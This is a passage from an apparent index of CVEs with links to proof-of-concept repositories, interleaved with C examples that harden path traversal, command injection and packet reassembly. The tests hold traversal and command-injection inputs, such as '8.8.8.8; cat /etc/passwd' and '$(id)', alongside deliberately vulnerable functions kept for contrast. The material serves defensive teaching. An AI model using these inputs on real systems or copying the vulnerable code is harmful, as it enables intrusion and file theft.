A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.

- [plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46068](https://github.com/plsanu/CVE-2021-46068)

### CVE-2021-46069 (2022-01-06)

A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.

- [plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46069](https://github.com/plsanu/CVE-2021-46069)

### CVE-2021-46070 (2022-01-06)

A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel.

- [plsanu/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46070](https://github.com/plsanu/CVE-2021-46070)

### CVE-2021-46071 (2022-01-06)

A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.

- [plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46071](https://github.com/plsanu/CVE-2021-46071)

### CVE-2021-46072 (2022-01-06)

A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List section in the login panel.

- [plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46072](https://github.com/plsanu/CVE-2021-46072)

### CVE-2021-46073 (2022-01-06)

A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List section in the login panel.

- [plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46073](https://github.com/plsanu/CVE-2021-46073)

### CVE-2021-46074 (2022-01-06)

A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings section in the login panel.

- [plsanu/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46074](https://github.com/plsanu/CVE-2021-46074)

### CVE-2021-46075 (2022-01-06)

A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations.

- [plsanu/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations)
- [plsanu/CVE-2021-46075](https://github.com/plsanu/CVE-2021-46075)

### CVE-2021-46076 (2022-01-06)

Sourcecodester Vehicle Service Management System 1.0 is vulnerable to unrestricted file upload. An attacker can upload a malicious PHP file via multiple endpoints, leading to code execution.

- [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution)
- [plsanu/CVE-2021-46076](https://github.com/plsanu/CVE-2021-46076)

### CVE-2021-46078 (2022-01-06)

An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.

- [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting)
- [plsanu/CVE-2021-46078](https://github.com/plsanu/CVE-2021-46078)

### CVE-2021-46079 (2022-01-06)

An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to HTML injection.

- [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection)
- [plsanu/CVE-2021-46079](https://github.com/plsanu/CVE-2021-46079)

### CVE-2021-46080 (2022-01-06)

A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. A successful CSRF attack leads to a stored cross-site scripting vulnerability.

- [plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS)
- [plsanu/CVE-2021-46080](https://github.com/plsanu/CVE-2021-46080)

### CVE-2021-46108 (2022-02-18)

D-Link DSL-2730E CT-20131125 devices allow XSS via the username parameter to the password page in the maintenance configuration.

- [g-rubert/CVE-2021-46108](https://github.com/g-rubert/CVE-2021-46108)

### CVE-2021-46143 (2022-01-06)

In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for m_groupSize.

- [nanopathi/external_expat_AOSP10_r33_CVE-2021-46143](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2021-46143)

### CVE-2021-46361 (2022-02-11)

An issue in the Freemark Filter of Magnolia CMS v6.2.11 and below allows attackers to bypass security restrictions and execute arbitrary code via a crafted FreeMarker payload.

- [mbadanoiu/CVE-2021-46361](https://github.com/mbadanoiu/CVE-2021-46361)

### CVE-2021-46362 (2022-02-11)

A Server-Side Template Injection (SSTI) vulnerability in the Registration and Forgotten Password forms of Magnolia v6.2.3 and below allows attackers to execute arbitrary code via a crafted payload entered into the fullname parameter.

- [mbadanoiu/CVE-2021-46362](https://github.com/mbadanoiu/CVE-2021-46362)

### CVE-2021-46363 (2022-02-11)

An issue in the Export function of Magnolia v6.2.3 and below allows attackers to perform Formula Injection attacks via crafted CSV/XLS files. These formulas may result in arbitrary code execution on a victim's computer when opening the exported files with Microsoft Excel.

- [mbadanoiu/CVE-2021-46363](https://github.com/mbadanoiu/CVE-2021-46363)

### CVE-2021-46364 (2022-02-11)

A vulnerability in the Snake YAML parser of Magnolia CMS v6.2.3 and below allows attackers to execute arbitrary code via a crafted YAML file.

- [mbadanoiu/CVE-2021-46364](https://github.com/mbadanoiu/CVE-2021-46364)

### CVE-2021-46365 (2022-02-11)

An issue in the Export function of Magnolia v6.2.3 and below allows attackers to execute XML External Entity attacks via a crafted XLF file.

- [mbadanoiu/CVE-2021-46365](https://github.com/mbadanoiu/CVE-2021-46365)

### CVE-2021-46366 (2022-02-11)

An issue in the Login page of Magnolia CMS v6.2.3 and below allows attackers to exploit both an Open Redirect vulnerability and Cross-Site Request Forgery (CSRF) in order to brute force and exfiltrate users' credentials.

- [mbadanoiu/CVE-2021-46366](https://github.com/mbadanoiu/CVE-2021-46366)

### CVE-2021-46381 (2022-03-04)

Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized reading of internal files such as /etc/passwd and /etc/shadow.

- [JCPpeiqi/-cve-2021-46381](https://github.com/JCPpeiqi/-cve-2021-46381)

### CVE-2021-46398 (2022-02-04)

A Cross-Site Request Forgery vulnerability exists in Filebrowser before 2.18.0 that allows attackers to create a backdoor user with admin privileges and gain access to the filesystem via a malicious HTML page sent to the victim. Because an admin can run commands through FileBrowser, this leads to RCE.

- [febinrev/CVE-2021-46398_Chamilo-LMS-RCE](https://github.com/febinrev/CVE-2021-46398_Chamilo-LMS-RCE)
- [LalieA/CVE-2021-46398](https://github.com/LalieA/CVE-2021-46398)

### CVE-2021-46417 (2022-04-07)

Insecure handling of a download function in Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 allows path traversal, leading to disclosure of internal files with root privileges.

- [Henry4E36/CVE-2021-46417](https://github.com/Henry4E36/CVE-2021-46417)
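CVE-2021-46381 and CVE-2021-46417 above are both path traversal in a file download handler on an embedded device. The following C is an added example, not the D-Link or Franklin Fueling firmware code and not any of the listed PoCs: it resolves an untrusted relative path under a fixed base directory purely lexically and rejects anything that escapes it. The function names, the `MAX_SEGS` and `OUT_LEN` limits, and the sample paths are assumptions made for the illustration; `base_dir` is assumed to be an absolute path without a trailing slash.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed limits for this example (not from any product). */
#define MAX_SEGS 32
#define OUT_LEN  512

/* Resolve user_path under base_dir lexically.
 * Returns 0 and writes "<base_dir>/<normalized>" to out on success;
 * -1 when the path is absolute, climbs above base_dir, is empty, or is too long. */
int safe_join(const char *base_dir, const char *user_path, char *out, size_t out_len)
{
    if (base_dir == NULL || user_path == NULL) return -1;
    if (user_path[0] == '/') return -1;                  /* absolute paths are never allowed */

    const char *seg[MAX_SEGS];                           /* start of each kept segment */
    size_t      seg_len[MAX_SEGS];
    size_t      depth = 0;

    const char *p = user_path;
    while (*p) {
        while (*p == '/') p++;                           /* collapse repeated slashes */
        if (*p == '\0') break;
        const char *start = p;
        while (*p && *p != '/') p++;
        size_t len = (size_t)(p - start);

        if (len == 1 && start[0] == '.') continue;                 /* "."  : no-op */
        if (len == 2 && start[0] == '.' && start[1] == '.') {      /* "..": pop one level */
            if (depth == 0) return -1;                             /* would climb above base_dir */
            depth--;
            continue;
        }
        if (depth == MAX_SEGS) return -1;
        seg[depth] = start;
        seg_len[depth] = len;
        depth++;
    }
    if (depth == 0) return -1;                           /* nothing to serve: "", ".", "a/.." */

    int n = snprintf(out, out_len, "%s", base_dir);
    if (n < 0 || (size_t)n >= out_len) return -1;
    size_t used = (size_t)n;
    for (size_t i = 0; i < depth; i++) {
        n = snprintf(out + used, out_len - used, "/%.*s", (int)seg_len[i], seg[i]);
        if (n < 0 || (size_t)n >= out_len - used) return -1;
        used += (size_t)n;
    }
    return 0;
}

/* Wrapper returning the resolved path or NULL on rejection.
 * Uses a static buffer, so it is for demos and tests, not for concurrent use. */
const char *resolve_or_null(const char *base_dir, const char *user_path)
{
    static char out[OUT_LEN];
    return safe_join(base_dir, user_path, out, sizeof out) == 0 ? out : NULL;
}

int main(void)
{
    /* Constructed inputs: a legitimate request and the classic escapes. */
    const char *base = "/var/www/files";
    const char *tries[] = {"docs/../readme.txt", "../../etc/passwd", "/etc/shadow",
                           "./a//b/./c", "a/b/../../..", "."};
    for (size_t i = 0; i < sizeof tries / sizeof tries[0]; i++) {
        const char *r = resolve_or_null(base, tries[i]);
        printf("%-20s -> %s\n", tries[i], r ? r : "REJECTED");
    }
    return 0;
}
```

Two caveats a reviewer would raise. First, this check operates on the decoded path: the HTTP layer must percent-decode exactly once before calling it, or `..%2F` arrives as a literal file name and is waved through. Second, lexical normalization says nothing about symlinks inside `base_dir`; the open itself should still use `realpath()` (or `openat()` with `O_NOFOLLOW` per component) and re-verify the prefix on the resolved path.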

### CVE-2021-46422 (2022-04-27)

Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.

- [nobodyatall648/CVE-2021-46422](https://github.com/nobodyatall648/CVE-2021-46422)
- [Chocapikk/CVE-2021-46422](https://github.com/Chocapikk/CVE-2021-46422)
- [twoning/CVE-2021-46422_PoC](https://github.com/twoning/CVE-2021-46422_PoC)
- [Awei507/CVE-RCE](https://github.com/Awei507/CVE-RCE)
- [yigexioabai/CVE-2021-46422_RCE](https://github.com/yigexioabai/CVE-2021-46422_RCE)
- [ZAxyr/CVE-2021-46422](https://github.com/ZAxyr/CVE-2021-46422)
- [xanszZZ/SDT_CW3B1_rce](https://github.com/xanszZZ/SDT_CW3B1_rce)
- [latings/CVE-2021-46422](https://github.com/latings/CVE-2021-46422)
- [CJ-0107/cve-2021-46422](https://github.com/CJ-0107/cve-2021-46422)
- [kelemaoya/CVE-2021-46422](https://github.com/kelemaoya/CVE-2021-46422)
- [yyqxi/CVE-2021-46422](https://github.com/yyqxi/CVE-2021-46422)
- [polerstar/CVE-2021-46422-poc](https://github.com/polerstar/CVE-2021-46422-poc)
- [kailing0220/CVE-2021-46422](https://github.com/kailing0220/CVE-2021-46422)
- [tucommenceapousser/CVE-2021-46422](https://github.com/tucommenceapousser/CVE-2021-46422)

### CVE-2021-46702 (2022-02-26)

Tor Browser 9.0.7 on Windows 10 build 10586 is vulnerable to information disclosure. This could allow local attackers to bypass the intended anonymity feature and obtain information about the onion services visited by a local user. This can be accomplished by analyzing RAM even several hours after the local user used the product. This occurs because the product does not properly free memory.

- [Exmak-s/CVE-2021-46702](https://github.com/Exmak-s/CVE-2021-46702)

### CVE-2021-46703 (2022-03-06)

In the IsolatedRazorEngine component of Antaris RazorEngine through 4.5.1-alpha001, an attacker can execute arbitrary .NET code in a sandboxed environment (if users can externally control template contents). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

- [BenEdridge/CVE-2021-46703](https://github.com/BenEdridge/CVE-2021-46703)

### CVE-2021-46704 (2022-03-06)

In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.

- [MithatGuner/CVE-2021-46704-POC](https://github.com/MithatGuner/CVE-2021-46704-POC)
- [Erenlancaster/CVE-2021-46704](https://github.com/Erenlancaster/CVE-2021-46704)
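CVE-2021-46422 and CVE-2021-46704 above are both unauthenticated OS command injection through a "ping this host" style parameter. The following C is an added example and is not the Telesquare firmware, the GenieACS code (which is TypeScript) or any of the listed PoCs. It shows the vulnerable shape (the host interpolated into a shell command) beside the hardened one (an allow-list check on the host, then an `argv` handed to `execvp()` so no shell ever parses it). Function names and the sample host list are assumptions made for the illustration; the authorization check the GenieACS entry also mentions is out of scope here and must still sit in front of this handler.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable shape: anything after ';', '|', '`' or "$(" in host runs as a
 * second command once the string reaches system(). Kept for contrast only. */
int ping_via_shell(const char *host, char *cmd, size_t cmd_len)
{
    return snprintf(cmd, cmd_len, "ping -c 1 %s", host);   /* ... then system(cmd) */
}

/* Allow-list check: hostname / IPv4 / IPv6 characters only, bounded length,
 * and no leading '-' so the value cannot be parsed as a ping option. */
bool host_is_safe(const char *host)
{
    size_t len = host ? strlen(host) : 0;
    if (len == 0 || len > 253) return false;
    if (host[0] == '-') return false;            /* "-f" would become a flood flag */
    for (size_t i = 0; i < len; i++) {
        char c = host[i];
        bool ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                  (c >= '0' && c <= '9') || c == '.' || c == '-' || c == ':';
        if (!ok) return false;
    }
    return true;
}

/* Hardened shape: fill argv for execvp(). Returns the argument count, or -1
 * if the host is rejected. argv needs room for 5 entries (4 + NULL). */
int build_ping_argv(const char *host, const char *argv[], size_t argv_len)
{
    if (argv_len < 5 || !host_is_safe(host)) return -1;
    argv[0] = "ping";
    argv[1] = "-c";
    argv[2] = "1";
    argv[3] = host;
    argv[4] = NULL;
    return 4;
}

/* Run ping without a shell. Returns ping's exit status, or -1 on rejection
 * or process error. Not called by main() so the demo works offline. */
int run_ping(const char *host)
{
    const char *argv[5];
    if (build_ping_argv(host, argv, 5) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(argv[0], (char *const *)argv);   /* argv words are never re-parsed */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Constructed host list for the demo and tests: 3 accepted, 6 rejected. */
int demo_rejected_count(void)
{
    const char *hosts[] = {
        "8.8.8.8", "example.com", "2001:db8::1",          /* accepted */
        "8.8.8.8; cat /etc/passwd", "$(id)", "`id`",       /* shell metacharacters */
        "-f", "", "host name",                             /* option, empty, space */
    };
    int rejected = 0;
    for (size_t i = 0; i < sizeof hosts / sizeof hosts[0]; i++)
        if (!host_is_safe(hosts[i])) rejected++;
    return rejected;
}

int main(void)
{
    const char *argv[5];
    const char *bad = "8.8.8.8; cat /etc/passwd";
    char cmd[256];
    ping_via_shell(bad, cmd, sizeof cmd);
    printf("shell command would be : %s\n", cmd);
    printf("argv build, same input : %d (-1 = rejected)\n", build_ping_argv(bad, argv, 5));
    if (build_ping_argv("example.com", argv, 5) > 0)
        printf("argv[3] for execvp     : %s\n", argv[3]);
    printf("rejected in demo list  : %d\n", demo_rejected_count());
    return 0;
}
```

The leading-dash rule matters even once the shell is gone: with `argv` in place the remaining injection surface is the target program's own option parser, so user data must never land in a position where it can be read as a flag.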

### CVE-2021-56789
- [DataSurgeon-ds/ds-cve-plugin](https://github.com/DataSurgeon-ds/ds-cve-plugin)

### CVE-2021-268855
- [sikkertech/CVE-2021-268855](https://github.com/sikkertech/CVE-2021-268855)

## 2020
### CVE-2020-0001 (2020-01-08)

In getProcessRecordLocked of ActivityManagerService.java, isolated apps are not handled correctly. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Android-10. Android ID: A-140055304.

- [Zachinio/CVE-2020-0001](https://github.com/Zachinio/CVE-2020-0001)

### CVE-2020-0014 (2020-02-13)

It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable. This could lead to a local escalation of privilege with no additional execution privileges needed. User action is needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Android-10. Android ID: A-128674520.

- [tea9/CVE-2020-0014-Toast](https://github.com/tea9/CVE-2020-0014-Toast)

### CVE-2020-0022 (2020-02-13)

In reassemble_and_dispatch of packet_fragmenter.cc, there is a possible out of bounds write due to an incorrect bounds calculation. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Android-10. Android ID: A-143894715.

- [leommxj/cve-2020-0022](https://github.com/leommxj/cve-2020-0022)
- [k3vinlusec/Bluefrag_CVE-2020-0022](https://github.com/k3vinlusec/Bluefrag_CVE-2020-0022)
- [Polo35/CVE-2020-0022](https://github.com/Polo35/CVE-2020-0022)
- [5k1l/cve-2020-0022](https://github.com/5k1l/cve-2020-0022)
- [lsw29475/CVE-2020-0022](https://github.com/lsw29475/CVE-2020-0022)
- [devdanqtuan/poc-for-cve-2020-0022](https://github.com/devdanqtuan/poc-for-cve-2020-0022)
- [themmokhtar/CVE-2020-0022](https://github.com/themmokhtar/CVE-2020-0022)
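CVE-2020-0022 above is a bounds bug in fragment reassembly, the same class as several of the other "missing or incorrect bounds check" entries on this page. The following C is an added example, not the Android `packet_fragmenter.cc` code and not any of the listed PoCs: a start/continuation reassembler with the unchecked copy beside the hardened one. The fragment wire format, the `MAX_PDU` limit and the function names are assumptions made for the illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed wire format: byte 0 = flags; a start fragment carries a
 * little-endian 16-bit total PDU length in bytes 1..2; the rest is payload.
 * Continuation fragments carry only flags + payload. */
#define MAX_PDU 1024u
enum { FLAG_START = 0x01 };

typedef struct {
    uint8_t buf[MAX_PDU];
    size_t  expected;   /* total length announced by the start fragment */
    size_t  offset;     /* payload bytes reassembled so far */
    bool    active;     /* a PDU is in progress */
} reasm_t;

/* Vulnerable shape of the bug class: the copy length comes straight from the
 * fragment and nothing compares it with the room left in buf, so an oversized
 * continuation writes past the reassembly buffer. Contrast only; never call
 * it with untrusted data. */
void reasm_feed_unchecked(reasm_t *r, const uint8_t *frag, size_t frag_len)
{
    size_t hdr = (frag[0] & FLAG_START) ? 3 : 1;
    memcpy(r->buf + r->offset, frag + hdr, frag_len - hdr);   /* OOB write */
    r->offset += frag_len - hdr;
}

/* Hardened version. Returns 1 when a complete PDU is in r->buf, 0 when more
 * fragments are needed, -1 when the fragment is rejected. */
int reasm_feed(reasm_t *r, const uint8_t *frag, size_t frag_len)
{
    if (frag == NULL || frag_len < 1) return -1;
    const uint8_t *payload;
    size_t payload_len;

    if (frag[0] & FLAG_START) {
        if (frag_len < 3) return -1;                      /* truncated header */
        size_t total = (size_t)frag[1] | ((size_t)frag[2] << 8);
        if (total == 0 || total > MAX_PDU) return -1;     /* cannot fit our buffer */
        r->expected = total;
        r->offset   = 0;
        r->active   = true;
        payload     = frag + 3;
        payload_len = frag_len - 3;
    } else {
        if (!r->active) return -1;                        /* continuation with no start */
        payload     = frag + 1;
        payload_len = frag_len - 1;
    }

    /* The check this bug class gets wrong: compare the incoming length with
     * the room actually left. offset + payload_len can wrap on 32-bit targets;
     * expected - offset cannot underflow because offset <= expected always. */
    size_t remaining = r->expected - r->offset;
    if (payload_len > remaining) {
        r->active = false;              /* drop the partial PDU, do not truncate */
        return -1;
    }
    memcpy(r->buf + r->offset, payload, payload_len);
    r->offset += payload_len;
    if (r->offset == r->expected) {
        r->active = false;
        return 1;
    }
    return 0;
}

/* Constructed fragments: a 6-byte PDU split 4 + 2. */
static const uint8_t START[] = {FLAG_START, 0x06, 0x00, 'a', 'b', 'c', 'd'};
static const uint8_t TAIL[]  = {0x00, 'e', 'f'};

/* Feed START then TAIL and return the assembled text (static buffer). */
const char *demo_assembled(void)
{
    static char text[MAX_PDU + 1];
    reasm_t r = {0};
    if (reasm_feed(&r, START, sizeof START) != 0) return "";
    if (reasm_feed(&r, TAIL, sizeof TAIL) != 1) return "";
    memcpy(text, r.buf, r.expected);
    text[r.expected] = '\0';
    return text;
}

/* Feed three hostile fragments and count how many the hardened path rejects. */
int demo_rejected_count(void)
{
    reasm_t r = {0};
    const uint8_t big[]    = {0x00, 'x', 'y', 'z', 'w'};   /* 4 bytes, only 2 remain */
    const uint8_t orphan[] = {0x00, 'q'};                  /* continuation, no start */
    const uint8_t huge[]   = {FLAG_START, 0xFF, 0xFF};     /* announces 65535 > MAX_PDU */
    int rejected = 0;
    reasm_feed(&r, START, sizeof START);
    rejected += reasm_feed(&r, big, sizeof big) < 0;       /* rejected, PDU dropped */
    rejected += reasm_feed(&r, orphan, sizeof orphan) < 0; /* dropped PDU => no start */
    rejected += reasm_feed(&r, huge, sizeof huge) < 0;
    return rejected;
}

int main(void)
{
    printf("assembled: %s\n", demo_assembled());
    printf("rejected : %d\n", demo_rejected_count());
    return 0;
}
```

Note what the hardened path does on failure: it abandons the whole in-progress PDU rather than copying what fits. Silently truncating keeps the state machine alive with attacker-controlled `offset`, which is exactly the state a follow-up fragment exploits.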

### CVE-2020-0023 (2020-02-13)

In setPhonebookAccessPermission of AdapterService.java, there is a possible disclosure of user contacts over bluetooth due to a missing permission check. This could lead to local information disclosure if a malicious app enables contacts over a bluetooth connection, with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-145130871.

- [362902755/CVE-2020-0023](https://github.com/362902755/CVE-2020-0023)

### CVE-2020-0041 (2020-03-10)

In binder_transaction of binder.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-145988638. References: Upstream kernel.

- [bluefrostsecurity/CVE-2020-0041](https://github.com/bluefrostsecurity/CVE-2020-0041)
- [j4nn/CVE-2020-0041](https://github.com/j4nn/CVE-2020-0041)
- [koharin/CVE-2020-0041](https://github.com/koharin/CVE-2020-0041)
- [vaginessa/CVE-2020-0041-Pixel-3a](https://github.com/vaginessa/CVE-2020-0041-Pixel-3a)
- [jcalabres/root-exploit-pixel3](https://github.com/jcalabres/root-exploit-pixel3)

### CVE-2020-0069 (2020-03-10)

In the ioctl handlers of the Mediatek Command Queue driver, there is a possible out of bounds write due to insufficient input sanitization and missing SELinux restrictions. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-147882143. References: M-ALPS04356754.

- [R0rt1z2/AutomatedRoot](https://github.com/R0rt1z2/AutomatedRoot)
- [TheRealJunior/mtk-su-reverse-cve-2020-0069](https://github.com/TheRealJunior/mtk-su-reverse-cve-2020-0069)
- [yanglingxi1993/CVE-2020-0069](https://github.com/yanglingxi1993/CVE-2020-0069)
- [quarkslab/CVE-2020-0069_poc](https://github.com/quarkslab/CVE-2020-0069_poc)
- [0xf15h/mtk_su](https://github.com/0xf15h/mtk_su)

### CVE-2020-0082 (2020-04-17)

In ExternalVibration of ExternalVibration.java, there is a possible activation of an arbitrary intent due to unsafe deserialization. This could lead to local escalation of privilege to system_server with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-140417434.

- [0x742/CVE-2020-0082-ExternalVibration](https://github.com/0x742/CVE-2020-0082-ExternalVibration)

### CVE-2020-0096 (2020-05-14)

In startActivities of ActivityStartController.java, there is a possible escalation of privilege due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9. Android ID: A-145669109.

- [wyu0hop/CVE-2020-0096](https://github.com/wyu0hop/CVE-2020-0096)
- [liuyun201990/StrandHogg2](https://github.com/liuyun201990/StrandHogg2)
- [tea9/CVE-2020-0096-StrandHogg2](https://github.com/tea9/CVE-2020-0096-StrandHogg2)
- [nahid0x1/CVE-2020-0096-strandhogg-exploit-p0c](https://github.com/nahid0x1/CVE-2020-0096-strandhogg-exploit-p0c)

### CVE-2020-0108 (2020-08-11)

In postNotification of ServiceRecord.java, there is a possible bypass of foreground process restrictions due to an uncaught exception. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.1, Android-9, Android-10. Android ID: A-140108616.

- [CrackerCat/ServiceCheater](https://github.com/CrackerCat/ServiceCheater)

### CVE-2020-0113 (2020-06-10)

In sendCaptureResult of Camera3OutputUtils.cpp, there is a possible out of bounds read due to a use after free. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9, Android-10. Android ID: A-150944913.

- [XDo0/ServiceCheater](https://github.com/XDo0/ServiceCheater)

### CVE-2020-0114 (2020-06-10)

In onCreateSliceProvider of KeyguardSliceProvider.java, there is a possible confused deputy due to a PendingIntent error. This could lead to local escalation of privilege that allows actions performed as the System UI, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-147606347.

- [tea9/CVE-2020-0114-systemui](https://github.com/tea9/CVE-2020-0114-systemui)

### CVE-2020-0121 (2020-06-10)

In updateUidProcState of AppOpsService.java, there is a possible permission bypass due to a logic error. This could lead to local information disclosure of location data with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-148180766.

- [mooneee/CVE-2020-0121](https://github.com/mooneee/CVE-2020-0121)

### CVE-2020-0136 (2020-06-11)

In multiple locations of Parcel.cpp, there is a possible out-of-bounds write due to an integer overflow. This could lead to local escalation of privilege in the system server with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-120078455.

- [Satheesh575555/libhwbinder_AOSP10_r33_CVE-2020-0136](https://github.com/Satheesh575555/libhwbinder_AOSP10_r33_CVE-2020-0136)

### CVE-2020-0137 (2020-06-11)

In setIPv6AddrGenMode of NetworkManagementService.java, there is a possible bypass of networking permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-141920289.

- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0137](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0137)
- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2020-0137](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2020-0137)

### CVE-2020-0138 (2020-06-11)

In get_element_attr_rsp of btif_rc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution if bluetoothtbd were used, which it isn't in typical Android platforms, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-142878416.

- [Satheesh575555/system_bt_AOSP10_r33-CVE-2020-0138](https://github.com/Satheesh575555/system_bt_AOSP10_r33-CVE-2020-0138)

### CVE-2020-0155 (2020-06-11)

In phNxpNciHal_send_ese_hal_cmd of phNxpNciHal_ext.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-139736386.

- [Trinadh465/hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155](https://github.com/Trinadh465/hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155)

### CVE-2020-0160 (2020-06-11)

In setSyncSampleParams of SampleTable.cpp, there is possible resource exhaustion due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-124771364.

- [nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0160](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0160)

### CVE-2020-0181 (2020-06-11)

